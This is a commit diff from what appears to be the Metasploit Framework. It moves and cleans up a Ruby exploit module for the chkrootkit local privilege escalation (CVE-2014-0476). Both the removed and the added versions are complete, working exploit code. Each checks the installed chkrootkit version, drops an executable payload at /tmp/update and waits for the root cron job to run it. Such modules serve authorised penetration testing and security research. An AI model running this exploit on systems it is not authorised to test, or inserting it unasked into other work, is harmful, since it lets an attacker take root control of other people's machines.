Clean up module

2015-11-18 10:35:11 -06:00 · 2015-11-18 10:35:11 -06:00 · 657e50bb86
parent 44d477a13c
commit 657e50bb86
2 changed files with 75 additions and 77 deletions
--- a/modules/exploits/linux/local/chkrootkit.rb
+++ b/modules/exploits/linux/local/chkrootkit.rb
@ -1,77 +0,0 @@
-##
-# This module requires Metasploit: http://metasploit.com/download
-# Current source: https://github.com/rapid7/metasploit-framework
-##
-
-class Metasploit4 < Msf::Exploit::Local
-  # This could also be excellent, but since it requires
-  # up to one day to pop a shell, lets set it to Manual instead.
-  Rank = ManualRanking
-
-  include Msf::Post::File
-  include Msf::Exploit::FileDropper
-
-  include Msf::Exploit::Local::Linux
-
-  def initialize(info = {})
-    super(update_info(info, {
-      'Name'    => 'Chkrootkit 0.49 Local Privilege Escalation',
-      'Description'   => %q(
-        Chkrootkit before 0.50 will run as root any executable file named
-        /tmp/updater, allowing a trivial privsec.
-
-        WfsDelay is set to 24h by default, since this is how often a chkrootkit
-        scan is scheduled by default.
-      ),
-      'License'     => MSF_LICENSE,
-      'Author'  => [
-        'Thomas Stangner', # original exploit
-        'Julien (jvoisin) Voisin' # metasploit module
-      ],
-      'Platform'    => %w( bsd linux unix solaris osx),
-      'SessionTypes'  => [ 'shell', 'meterpreter' ],
-      'References'  =>
-      [
-        [ 'BID', '67813' ],
-        [ 'CVE', '2014-0476' ],
-        [ 'CWE', '20' ],
-        [ 'EDB', '33899' ],
-        [ 'OSVDB', '107710' ],
-        [ 'URL', 'http://seclists.org/oss-sec/2014/q2/430' ]
-      ],
-      'DisclosureDate' => "Jun 28 2014",
-      'Arch'       => ARCH_CMD,
-      'DefaultOptions' => { 'WfsDelay' => 60 * 60 * 24 },
-      'Privileged'   => true,
-      'Targets'     => [[ 'Generic', {} ]],
-      'Stance' => Msf::Exploit::Stance::Passive,
-      'DefaultTarget' => 0 }))
-  end
-
-  def check
-    res = cmd_exec('/usr/sbin/chkrootkit -V')
-    if res && res =~ /chkrootkit version 0\.[^5]/
-      Exploit::CheckCode::Appears
-    else
-      Exploit::CheckCode::Safe
-    end
-  end
-
-  def exploit
-    if check == Exploit::CheckCode::Safe
-      fail_with(Failure::NotVulnerable, "Target is not vulnerable.")
-    else
-      print_good("Target is vulnerable.")
-    end
-
-    print_warning('Rooting depends of the crontab, this could take a while.')
-
-    write_file("/tmp/update", "#!/bin/sh\n#{payload.encoded}\n")
-    cmd_exec("chmod +x /tmp/update")
-
-    print_status 'Payload written to /tmp/update'
-    print_status 'Waiting to chkrookit to be run be a cron tab...'
-
-    register_file_for_cleanup('/tmp/update')
-  end
-end
--- a/modules/exploits/unix/local/chkrootkit.rb
+++ b/modules/exploits/unix/local/chkrootkit.rb
@ -0,0 +1,75 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class Metasploit4 < Msf::Exploit::Local
+
+  # This could also be Excellent, but since it requires
+  # up to one day to pop a shell, let's set it to Manual instead.
+  Rank = ManualRanking
+
+  include Msf::Post::File
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Chkrootkit Local Privilege Escalation',
+      'Description'    => %q{
+        Chkrootkit before 0.50 will run any executable file named
+        /tmp/update as root, allowing a trivial privsec.
+
+        WfsDelay is set to 24h, since this is how often a chkrootkit
+        scan is scheduled by default.
+      },
+      'Author'         => [
+        'Thomas Stangner',        # Original exploit
+        'Julien "jvoisin" Voisin' # Metasploit module
+      ],
+      'References'     => [
+        ['CVE', '2014-0476'],
+        ['OSVDB', '107710'],
+        ['EDB', '33899'],
+        ['BID', '67813'],
+        ['CWE', '20'],
+        ['URL', 'http://seclists.org/oss-sec/2014/q2/430']
+      ],
+      'DisclosureDate' => 'Jun 04 2014',
+      'License'        => MSF_LICENSE,
+      'Platform'       => 'unix',
+      'Arch'           => ARCH_CMD,
+      'SessionTypes'   => ['shell', 'meterpreter'],
+      'Privileged'     => true,
+      'Stance'         => Msf::Exploit::Stance::Passive,
+      'Targets'        => [['Automatic', {}]],
+      'DefaultTarget'  => 0,
+      'DefaultOptions' => {'WfsDelay' => 60 * 60 * 24} # 24h
+    ))
+
+    register_options([
+      OptString.new('CHKROOTKIT', [true, 'Path to chkrootkit', '/usr/sbin/chkrootkit'])
+    ])
+  end
+
+  def check
+    version = cmd_exec("#{datastore['CHKROOTKIT']} -V 2>&1")
+
+    if version =~ /chkrootkit version 0\.[1-4]/
+      Exploit::CheckCode::Appears
+    else
+      Exploit::CheckCode::Safe
+    end
+  end
+
+  def exploit
+    print_warning('Rooting depends on the crontab (this could take a while)')
+
+    write_file('/tmp/update', "#!/bin/sh\n(#{payload.encoded}) &\n")
+    cmd_exec('chmod +x /tmp/update')
+    register_file_for_cleanup('/tmp/update')
+
+    print_status('Payload written to /tmp/update')
+    print_status('Waiting for chkrootkit to run via cron...')
+  end
+
+end